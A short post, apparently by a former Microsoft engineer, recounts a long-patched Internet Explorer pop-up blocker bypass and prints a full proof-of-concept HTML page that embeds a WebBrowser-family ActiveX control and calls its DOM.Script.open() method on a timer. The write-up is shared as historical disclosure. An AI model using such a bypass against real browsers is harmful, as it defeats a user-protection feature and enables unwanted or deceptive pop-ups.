I was playing around with the WebBrowser-family ActiveX controls and noticed that one of them exposed a DOM.Script.open() method that bypassed the pop-up blocker entirely. The control essentially acted as a trusted intermediary for window creation.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<TITLE> Test Document </TITLE></HEAD>
<BODY>
<FONT FACE="Verdana" SIZE="3">
ActiveX popUp byPass Variation.
</FONT>
<OBJECT ID="activeX" CLASSID="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" WIDTH="1" HEIGHT="1">
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</OBJECT>
<SCRIPT LANGUAGE="JavaScript">
function runPopUp(){
	var myPop=document.all.activeX.DOM.Script.open("http://www.google.com/","_blank","width=300,height=300,toolbar=no");
}
setTimeout('runPopUp()',1000);
</SCRIPT>
</BODY>
</HTML>

The ActiveX control (CLSID 2D360201-FFF5-11d1-8D03-00A0C959BC0A) exposes a DOM.Script object which in turn has an open() method. Because the call comes from the control’s context rather than from a direct script on the page, IE’s pop-up blocker did not intercept it. The one-second timeout is just there to ensure the control is ready before the call.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.